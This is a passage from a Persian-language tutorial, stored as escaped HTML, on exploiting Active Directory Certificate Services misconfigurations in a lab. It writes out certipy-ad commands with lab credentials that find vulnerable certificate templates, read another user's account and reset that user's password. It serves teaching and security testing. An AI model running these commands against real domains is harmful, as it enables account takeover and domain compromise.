        • \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong>: \u0645\u062f\u06cc\u0631\u06cc\u062a \u0646\u0627\u062f\u0631\u0633\u062a keyCredentialLink \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f \u06a9\u0647 \u062d\u062a\u06cc \u0628\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0627\u062f\u0627\u0645\u0647 \u0645\u06cc\u200c\u06cc\u0627\u0628\u062f (ESC9\/10).<\/span><\/li>\n
        • \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632<\/strong> (ESC)<\/strong>: \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u0627\u0646\u0646\u062f SAN\u200c\u0647\u0627\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0634\u062f\u0647 \u0646\u0627\u062f\u0631\u0633\u062a (ESC1)\u060c NTLM relay (ESC8) \u0648 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 (ESC9\/10) \u0628\u0631\u0627\u06cc \u062a\u0635\u0627\u062d\u0628 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.<\/span><\/li>\n<\/ul>\n

          \u0645\u0642\u062f\u0645\u0627\u062a<\/strong><\/span><\/p>\n

            \n
          • Windows Server 2019 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 Active Directory \u06a9\u0647 \u0627\u0632 PKINIT \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n
          • \u062f\u0627\u0645\u0646\u0647 \u0628\u0627\u06cc\u062f \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory \u0648 Certificate Authority \u0631\u0627 \u0628\u0627 \u0646\u0642\u0634 Web Enrollment \u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/li>\n
          • Kali Linux \u0628\u0627 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627.<\/span><\/li>\n
          • \u0627\u0628\u0632\u0627\u0631\u0647\u0627: certipy-ad, PetitPotam<\/span><\/li>\n<\/ul>\n

            \u0645\u0627 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a ADCS \u0628\u0647 \u0635\u0641\u0631 \u0631\u0648\u0632 \u0646\u06cc\u0627\u0632\u06cc \u0646\u062f\u0627\u0631\u06cc\u0645. \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062a\u0635\u0627\u062d\u0628 \u06a9\u0627\u0645\u0644 \u062f\u0627\u0645\u0646\u0647 \u0634\u0648\u062f\u060c \u0647\u0645\u0627\u0646\u0646\u062f \u06cc\u06a9 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631\u060c \u0627\u0645\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u0628\u0648\u0645\u06cc \u0648 \u067e\u0631\u0648\u062a\u06a9\u0644\u200c\u0647\u0627\u06cc \u0642\u0627\u0646\u0648\u0646\u06cc.<\/span><\/p>\n

            \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f Certipy \u0627\u06cc\u0646 \u0627\u0641\u0632\u0627\u06cc\u0634\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0627\u0639\u062a\u0645\u0627\u062f \u0631\u0627 \u062f\u0631 \u062f\u0627\u062e\u0644 ADCS \u06a9\u0634\u0641 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/span><\/p>\n

            \u062d\u0627\u0644\u0627 \u06a9\u0647 \u062f\u0631\u06a9 \u062e\u0648\u0628\u06cc \u0627\u0632 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (ADCS) \u0648 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc ESC \u062f\u0627\u0631\u06cc\u0645\u060c \u0645\u0634\u062e\u0635 \u0627\u0633\u062a \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f ADCS \u0647\u062f\u0641\u06cc \u0628\u0631\u062c\u0633\u062a\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0628\u0627\u0634\u062f.<\/span><\/p>\n

            \u0628\u0627 \u062f\u0631 \u0646\u0638\u0631 \u06af\u0631\u0641\u062a\u0646 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u060c \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0647 \u0637\u0648\u0631 \u0639\u0645\u0644\u06cc \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 certipy-ad.<\/span><\/p>\n

            \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/p>\n

            \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0646\u0642\u0627\u0637 \u0636\u0639\u0641 \u0634\u0631\u0648\u0639 \u06a9\u0646\u06cc\u0645. \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0647 \u0647\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u200c\u0634\u062f\u0647 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u06a9\u0646\u062f.<\/span><\/p>\n

            certipy-ad find -u raj -p Password@1 -dc-ip 192.168.1.20 -target-ip 192.168.1.20 -vulnerable -enable -stdout<\/span><\/p>\n

            \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 CA \u0631\u0627 \u0627\u0633\u06a9\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u06a9\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u06cc \u062f\u0627\u0631\u0646\u062f \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 (privilege escalation) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0634\u0628\u06cc\u0647 \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0646\u0648\u0639 ESC1 \u0627\u0633\u062a.<\/span><\/p>\n

            \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062f\u0633\u062a\u0648\u0631 certipy-ad find \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f ESC1 \u0645\u0646\u062c\u0631 \u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0644\u06af\u0648\u0647\u0627 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646\u06cc \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u0635\u062d\u06cc\u062d \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0627\u0645\u06a9\u0627\u0646 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u0645\u0627\u0646\u0646\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f.<\/span><\/p>\n

            \"\"<\/span><\/p>\n

            \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f Client Authentication EKU\u060c “Supply in Request” SAN\u060c \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0628\u062f\u0648\u0646 \u062a\u0627\u06cc\u06cc\u062f \u0648 \u062f\u0633\u062a\u0631\u0633\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u067e\u0627\u06cc\u06cc\u0646 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c “sanjeet \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f) \u062f\u0627\u0631\u0646\u062f. \u062d\u0627\u0644\u0627 \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0628\u0628\u06cc\u0646\u06cc\u0645 \u06a9\u0647 \u0686\u0647 \u0645\u0648\u0627\u0631\u062f\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0631\u062f\u0647\u200c\u0627\u06cc\u0645.<\/span><\/p>\n

            \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c CA \u0648 \u0627\u0644\u06af\u0648\u0647\u0627 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0627\u0632 \u062d\u0645\u0644\u0627\u062a ESC \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c ESC6\u060c ESC8) \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n

            \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0639\u0645\u0648\u0644 \u0634\u0627\u0645\u0644 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0627\u0639\u062b \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u0634\u0648\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a EKU (Extended Key Usage) \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc\u060c \u0648\u062c\u0648\u062f \u06af\u0632\u06cc\u0646\u0647 “Supply in Request” SAN (Subject Alternative Name) \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062e\u0627\u0635\u06cc \u0631\u0627 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0648\u0627\u0631\u062f \u06a9\u0646\u062f\u060c \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0635\u062f\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627 \u0628\u062f\u0648\u0646 \u062a\u0627\u06cc\u06cc\u062f \u06a9\u0647 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0647 \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u067e\u0627\u06cc\u06cc\u0646\u060c \u0645\u0627\u0646\u0646\u062f “sanjeet”\u060c \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0628\u062f\u0647\u062f \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u062d\u0633\u0627\u0633 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u062f.<\/span><\/p>\n

            \"\"<\/span><\/p>\n

            \u062a\u0648\u062c\u0647<\/strong>:<\/strong> \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u067e\u0627\u06cc\u0647\u200c\u06af\u0630\u0627\u0631\u06cc \u0628\u0631\u0627\u06cc \u06a9\u0644 \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0645\u0627 \u0627\u0633\u062a. \u0628\u062f\u0648\u0646 \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u060c \u0627\u06a9\u062b\u0631 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0645\u0645\u06a9\u0646 \u0646\u062e\u0648\u0627\u0647\u0646\u062f \u0628\u0648\u062f.<\/span><\/p>\n

            \u0628\u0631\u0631\u0633\u06cc \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062d\u0633\u0627\u0628<\/strong><\/span><\/p>\n

            \u062d\u0627\u0644\u0627 \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0686\u0647 \u0686\u06cc\u0632\u06cc \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u06cc\u0645. \u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0645\u0627 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c raj) \u0642\u0627\u062f\u0631 \u0628\u0647 \u062e\u0648\u0627\u0646\u062f\u0646 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631\u06cc (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c sanjeet) \u0628\u0627\u0634\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0642\u0627\u062f\u0631 \u0628\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0628\u0627\u0634\u06cc\u0645:<\/span><\/p>\n

              \n
            • \u062a\u0632\u0631\u06cc\u0642 \u06cc\u06a9 \u0627\u0639\u062a\u0628\u0627\u0631 \u067e\u0646\u0647\u0627\u0646 (shadow credential) \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0639\u062f\u06cc<\/span><\/li>\n
            • \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a<\/span><\/li>\n
            • \u0627\u0641\u0632\u0648\u062f\u0646 \u062e\u0648\u062f \u0628\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0631\u0627\u06cc \u06a9\u0646\u062a\u0631\u0644 \u0628\u06cc\u0634\u062a\u0631<\/span><\/li>\n<\/ul>\n

              \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0627\u06cc\u0646 \u06a9\u0627\u0631\u060c \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n

              certipy-ad account -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user sanjeet read<\/span><\/pre>\n
              \u0633\u0648\u0626\u06cc\u0686 read \u062f\u0631 Certipy \u0628\u0647 raj \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 sanjeet \u0631\u0627 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0648 \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0646\u062f\u060c \u0645\u0627\u0646\u0646\u062f cn\u060c sAMAccount \u0648 \u0633\u0627\u06cc\u0631 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u06cc\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u0646\u062f.<\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u062a\u0648\u0627\u0646\u062f \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u062f\u06cc\u06af\u0631\u06cc \u0631\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0647\u062f\u060c \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0627\u062a \u0628\u06cc\u0634\u062a\u0631\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/p>\n
              \u067e\u0633 \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f \u0645\u062c\u0648\u0632\u0647\u0627\u06cc \u062e\u0648\u062f\u060c \u062d\u0627\u0644\u0627 \u0627\u0642\u062f\u0627\u0645 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u0627\u06a9\u0646\u0648\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0628\u0631\u0627\u06cc \u0646\u0634\u0627\u0646 \u062f\u0627\u062f\u0646 \u0646\u062d\u0648\u0647 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u062a\u0648\u0633\u0637 \u062e\u0648\u062f\u0645\u0627\u0646 \u06cc\u0627 \u0645\u062f\u06cc\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n
              \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong><\/span><\/p>\n
              \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u062f\u06cc\u0631 (Administrator) \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 sanjeet \u0628\u0647 Password@12 \u062f\u0631 Domain Controller \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 (\u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f2\u06f0) \u0627\u0642\u062f\u0627\u0645 \u06a9\u0646\u062f\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627\u0639\u062b \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644 \u0628\u0631 \u062d\u0633\u0627\u0628 sanjeet \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0634\u0648\u062f.<\/span><\/p>\n
              certipy-ad account -u Administrator -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user sanjeet -pass Password@12 update<\/span><\/pre>\n
              \u067e\u0633 \u0627\u0632 \u0627\u0631\u062a\u0642\u0627 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0627\u0632 \u0637\u0631\u06cc\u0642 ESC1)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0647\u0631 \u06a9\u0627\u0631\u0628\u0631 \u062f\u0627\u0645\u0646\u0647\u200c\u0627\u06cc \u0631\u0627 \u0631\u06cc\u0633\u062a \u06a9\u0646\u06cc\u0645\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0645\u062f\u06cc\u0631\u0627\u0646\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u062a\u0633\u0644\u0637 \u0641\u0648\u0631\u06cc \u0628\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u060c \u06a9\u0646\u062a\u0631\u0644 \u0628\u0631 \u0686\u0646\u062f\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0648 \u062d\u0631\u06a9\u062a \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc\u06a9 \u0628\u0647 \u0633\u0645\u062a \u062f\u06cc\u06af\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
